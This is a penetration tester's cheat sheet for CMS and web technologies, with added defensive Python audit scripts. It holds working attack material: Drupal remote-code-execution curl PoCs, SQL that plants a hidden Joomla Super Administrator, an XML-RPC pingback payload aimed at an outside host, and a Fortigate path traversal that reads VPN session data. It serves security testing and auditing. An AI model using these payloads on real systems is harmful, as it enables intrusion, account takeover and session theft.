Techno Specific
CMS
Tools
# cmsmap
git clone https://github.com/Dionach/CMSmap && cd CMSmap && pip3 install .
cmsmap.py <target> -o cmsmap.log
# wig
git clone https://github.com/jekyc/wig.git && cd wig && python3 setup.py install
wig.py <target> -w wig.log
# wpseku
git clone https://github.com/m4ll0k/WPSeku.git && cd WPSeku && pip install -r requirements.txt
python wpseku.py --target <target>
# droopescan
pip install droopescan
droopescan scan drupal -t 32 -u <target> [-U list_of_urls.txt]
# joomscan
joomscan -u <target>
WordPress
WPScan (needs an API token)
wpscan -v --proxy socks5://127.0.0.1:9090 -e u1-100,ap,at,cb,dbe --passwords rockyou.txt --api-token <API_key> --url <target>
* u1-100: users with ids 1 to 100
* ap: all plugins
* at: all themes
* cb: config backups
* dbe: database export
Find version
- in the RSS feed XML at website.com/rss
- HTML source code
- CMSmap or WPScan
XML-RPC
List methods:
POST /xmlrpc.php HTTP/1.1
Host: <target>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 95
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
If pingback.ping is listed, try:
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<ip_pingback>:<port></string></value>
</param><param><value><string>http://<ip_pingback>:<port>/toto</string>
</value></param></params>
</methodCall>
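The two requests above are easier to run as a repeatable audit of your own xmlrpc.php. The script below is an added example (not part of the cheat sheet and not WordPress code): it builds the system.listMethods body with the standard-library xmlrpc.client module, parses the methodResponse, and reports which of a small, author-chosen checklist of risky methods (the RISKY_METHODS mapping is an assumption, not a WordPress API) the endpoint advertises. The sample response is constructed so the check runs offline; audit_endpoint() sends the same request to a live site.

```python
import urllib.request
import xmlrpc.client

# Assumption: an audit checklist written for this example, not a WordPress constant.
RISKY_METHODS = {
    "pingback.ping": "pingback enabled: the site can be made to fetch arbitrary URLs",
    "wp.getUsersBlogs": "credential checks over XML-RPC sidestep login rate limiting",
    "system.multicall": "many calls per HTTP request, which amplifies password guessing",
}


def build_list_methods_request() -> bytes:
    """Body of the system.listMethods call shown in the cheat sheet."""
    return xmlrpc.client.dumps((), methodname="system.listMethods").encode()


def exposed_risky_methods(response_xml: str) -> dict:
    """Parse a methodResponse and return the risky methods it advertises."""
    params, _ = xmlrpc.client.loads(response_xml)
    advertised = set(params[0])  # the single param is the array of method names
    return {m: why for m, why in RISKY_METHODS.items() if m in advertised}


def sample_response() -> str:
    """Constructed answer, as a WordPress site with pingback enabled would reply."""
    methods = ["system.listMethods", "system.multicall", "pingback.ping",
               "wp.getUsersBlogs", "demo.sayHello"]
    return xmlrpc.client.dumps((methods,), methodresponse=True)


def audit_endpoint(url: str, timeout: float = 10.0) -> dict:
    """POST the request to a live xmlrpc.php (your own site) and audit the answer."""
    req = urllib.request.Request(url, data=build_list_methods_request(),
                                 headers={"Content-Type": "text/xml"}, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return exposed_risky_methods(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Offline run on the constructed response; pass a URL to audit_endpoint() for a real site.
    for method, why in exposed_risky_methods(sample_response()).items():
        print(f"{method}: {why}")
```

On the defensive side, WordPress lets a theme or plugin drop individual methods through the `xmlrpc_methods` filter (unset `pingback.ping` from the array it receives) or switch the whole interface off via the `xmlrpc_enabled` filter; re-running the audit confirms the method list actually changed.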
Drupal
- Intruder on /node/$ with payloads 0 to 500 (enumerate node ids)
- /imce (IMCE file browser module, check whether it is exposed)
PoC 1 (Drupal 8):
curl -k -i '<target>/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
--data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=uname -a'
PoC 2 (Drupal 8):
curl -k -i '<target>/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
--data 'form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=touch+/tmp/2'
PoC 3 (Drupal 7):
curl -k -s '<target>/drupal-7.55/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a' \
--data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id
Joomla
Joomla 1.5
Hash format for John the Ripper: user:md5_gen(1)MD5$SALT (Joomla 1.5 stores MD5(password + salt):salt)
- https://www.exploit-db.com/exploits/6234
- http://www.passwordtool.hu/joomla-password-hash-generator-salt-key
Create a new Super Administrator user:
INSERT INTO jos_users (name, username, password, usertype, gid, params) VALUES ('toto', 'toto', 'fcba92f4dd6b902f8a66054b8327ae6b:F2sVBzlFOUl51D3HtRZ0tionaJQGQqB', 'Super Administrator', 25, '');
INSERT INTO jos_core_acl_aro VALUES (NULL, 'users', LAST_INSERT_ID(), 0, 'toto', 0);
INSERT INTO jos_core_acl_groups_aro_map VALUES (25, '', LAST_INSERT_ID());
Moodle
sudo apt update && sudo apt install python3 python3-pip && cd moodlescan && pip3 install -r requirements.txt
python3 moodlescan.py -k -u <URL>
Websocket
Enumeration using STEWS:
https://github.com/PalindromeLabs/STEWS/blob/main/vuln-detect/STEWS-vuln-detect.py
SQL injection:
Run python3 mitm_websocket.py ws://localhost:8156/ws, then point sqlmap at the HTTP bridge it exposes:
sqlmap -u "http://localhost:8081/?id=1" --batch --dbs
Reactjs
- React Developer Tools (edit props/state/hooks values)
Security testers: inject JavaScript and JSON wherever you can and see what happens.
Developers: never use eval() or dangerouslySetInnerHTML. Avoid parsing user-supplied JSON.
Webpack configuration (.map)
Use sourcemapper:
for i in $(cat url.txt); do ./sourcemapper -url "$i.map" -output output_dir; done
Angularjs
Check the bypassSecurityTrustX / innerHTML functions:
bypassSecurityTrustHtml
bypassSecurityTrustScript
bypassSecurityTrustStyle
bypassSecurityTrustUrl
bypassSecurityTrustResourceUrl
ckfinder
ckfinder/ckfinder.html
Git
Run a script on post-merge: place it in .git/hooks/post-merge (see https://docs.gitlab.com/ee/administration/custom_hooks.html)
Stormshield
# Check default password (UpdatePasswd=1 if factory password, 0 if the password has already been changed)
CHPWD 101 code=00a01000 msg="Begin" format="section" [Result] UpdatePasswd=0
Fortigate
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
Dana (Pulse Secure)
https://XXXX/dana-na/setup/psalinstall.cgi
SSL / TLS
Openssl
openssl s_client -cipher BEAST -connect <target>:443
openssl s_client -connect <target>:443 -ssl3
# Expiration date
openssl s_client -connect <target>:443 | openssl x509 -noout -dates
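The expiration-date check above is most useful when it runs over a list of hosts and flags what is about to lapse. This is an added example (not from the cheat sheet): it parses the notBefore/notAfter lines that `openssl x509 -noout -dates` prints, classifies the certificate against a chosen "now", and wraps the page's command chain for live hosts (adding -servername so SNI hosts return the right certificate). SAMPLE_DATES is constructed input; the warn_days threshold is an assumption.

```python
import subprocess
from datetime import datetime, timezone

# openssl prints dates like "notAfter=Mar  9 23:59:59 2025 GMT"
_FMT = "%b %d %H:%M:%S %Y %Z"

# Constructed output of `openssl x509 -noout -dates` for the offline run.
SAMPLE_DATES = """notBefore=Jan  1 00:00:00 2024 GMT
notAfter=Mar  9 23:59:59 2025 GMT
"""


def parse_openssl_dates(text: str) -> dict:
    """Turn the notBefore/notAfter lines into timezone-aware datetimes."""
    out = {}
    for line in text.splitlines():
        key, _, value = line.strip().partition("=")
        if key in ("notBefore", "notAfter"):
            value = " ".join(value.split())  # collapse the padding used for single-digit days
            out[key] = datetime.strptime(value, _FMT).replace(tzinfo=timezone.utc)
    return out


def certificate_status(text: str, now_iso: str, warn_days: int = 30) -> tuple:
    """Return (status, days_left); status is 'not-yet-valid', 'expired', 'expiring' or 'ok'."""
    now = datetime.fromisoformat(now_iso)
    if now.tzinfo is None:
        now = now.replace(tzinfo=timezone.utc)  # assumption: naive timestamps are UTC
    dates = parse_openssl_dates(text)
    days_left = (dates["notAfter"] - now).days
    if now < dates["notBefore"]:
        return "not-yet-valid", days_left
    if days_left < 0:
        return "expired", days_left
    if days_left <= warn_days:
        return "expiring", days_left
    return "ok", days_left


def check_live(host: str, port: int = 443) -> tuple:
    """Run the cheat sheet's openssl chain against a live host and classify the result."""
    s_client = subprocess.run(
        ["openssl", "s_client", "-connect", f"{host}:{port}", "-servername", host],
        input="", capture_output=True, text=True, timeout=20)
    x509 = subprocess.run(["openssl", "x509", "-noout", "-dates"],
                          input=s_client.stdout, capture_output=True, text=True, timeout=20)
    return certificate_status(x509.stdout, datetime.now(timezone.utc).isoformat())


if __name__ == "__main__":
    print(certificate_status(SAMPLE_DATES, "2025-02-20T00:00:00+00:00"))
```

Feeding `check_live()` the same host list used for the Heartbleed loop below gives a single pass over both concerns; the empty stdin passed to s_client replaces the `echo "QUIT" |` idiom.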
Check Heartbleed (this only tests whether the heartbeat extension is advertised; a patched server can still advertise it, so confirm with a dedicated Heartbleed test)
cat list.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done
Check Lucky13
openssl s_client -cipher DES-CBC3-SHA -connect <target>:443
Android
Apktool
apktool d app_name.apk
Grep the decoded APK for sensitive info:
grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/
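The grep above is noisy on a large decoded APK: "admin" and "token" match plenty of harmless code. The script below is an added example (not part of the cheat sheet or of apktool): it keeps the same keyword list, and additionally flags quoted string literals whose Shannon entropy is high enough to look like a key or token rather than prose. SAMPLE_SMALI is constructed input; the entropy threshold and the file-extension list are assumptions to tune per app.

```python
import math
import os
import re

# Same keywords as the grep above, compiled case-insensitively.
KEYWORDS = re.compile(
    r"accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|https?:|password|pinning"
    r"|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into",
    re.IGNORECASE)
# Quoted literals long enough to be a credential (base64/hex-like alphabet, no spaces).
LITERAL = re.compile(r'"([A-Za-z0-9+/=_\-]{20,})"')

# Constructed smali fragment; the long literal is base64 of "BogusKeyForDemoOnly".
SAMPLE_SMALI = '''const-string v0, "https://api.example.invalid/v1"
const-string v1, "api_key"
const-string v2, "Qm9ndXNLZXlGb3JEZW1vT25seQ=="
const-string v3, "This is a plain message"
invoke-virtual {p0}, Landroid/content/Context;->getSharedPreferences
'''


def shannon_entropy(s: str) -> float:
    """Bits per character; random keys score well above readable text."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def scan_text(text: str, path: str = "<input>", min_entropy: float = 3.5) -> list:
    """Return (path, line_no, kind, match) for keyword hits and high-entropy literals."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for m in KEYWORDS.finditer(line):
            findings.append((path, no, "keyword", m.group(0)))
        for m in LITERAL.finditer(line):
            literal = m.group(1)
            if shannon_entropy(literal) >= min_entropy:
                findings.append((path, no, "high-entropy", literal))
    return findings


def scan_tree(root: str, exts=(".smali", ".xml", ".java", ".json", ".properties")) -> list:
    """Walk an apktool output directory (e.g. APKfolder/) and scan text-like files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(fh.read(), path))
    return findings


if __name__ == "__main__":
    for path, no, kind, match in scan_text(SAMPLE_SMALI, "demo.smali"):
        print(f"{path}:{no}: {kind}: {match}")
```

Run `scan_tree("APKfolder/")` after `apktool d`; the high-entropy hits are the ones to review first, since a hard-coded key found this way should be rotated and moved out of the APK regardless of how it is obfuscated.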